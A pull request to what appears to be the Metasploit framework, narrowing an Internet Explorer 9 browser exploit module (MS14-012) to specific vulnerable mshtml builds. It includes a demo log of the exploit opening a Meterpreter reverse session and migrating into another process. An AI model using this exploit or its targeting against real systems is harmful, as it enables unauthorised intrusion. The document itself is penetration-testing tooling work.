### PR TITLE
Add ua_ver and mshtml_build requirements

### DIFF
--- a/modules/exploits/windows/browser/ms14_012_textrange.rb
+++ b/modules/exploits/windows/browser/ms14_012_textrange.rb
@@ -37,8 +37,9 @@ class Metasploit3 < Msf::Exploit::Remote
           :source  => /script/i,
           :os_name => OperatingSystems::WINDOWS,
           :ua_name => HttpClients::IE,
-          :office  => "2010"
-          #:ua_ver  => '9.0' # Some fingerprinting issue w/ os_detect, disabled for now
+          :office  => "2010",
+          :ua_ver  => '9.0',
+          :mshtml_build => lambda { |ver| ver.to_i.between?(16496, 16533) }
         },
       'Targets'        =>
         [

--- a/modules/exploits/windows/browser/ms14_012_textrange.rb
+++ b/modules/exploits/windows/browser/ms14_012_textrange.rb
@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
           :ua_name => HttpClients::IE,
           :office  => "2010",
           :ua_ver  => '9.0',
-          :mshtml_build => lambda { |ver| ver.to_i.between?(16496, 16533) }
+          :mshtml_build => lambda { |ver| ver.to_i.between?(16496, 16533) } # Covers MS13-Jul to MS14-Feb
         },
       'Targets'        =>
         [


### PR DESCRIPTION
This vulnerability is specific to these builds of IE9: 9.0.8112.16496 (MS13-Jul) - 9.0.8112.16533 (MS14-Feb).

Demo:

```
msf exploit(ms14_012_textrange) > [*] 10.0.1.89        ms14_012_textrange - Gathering target information.
[*] 10.0.1.89        ms14_012_textrange - Sending response HTML.
[*] Sending stage (769536 bytes) to 10.0.1.89
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.89:49950) at 2014-03-25 11:35:03 -0500
[*] Session ID 1 (10.0.1.76:4444 -> 10.0.1.89:49950) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3400)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2764
[+] Successfully migrated to process 
```

Verification is pretty much the same as #3120. A patch level that's vulnerable to this can be downloaded here: http://technet.microsoft.com/en-us/security/bulletin/ms14-feb
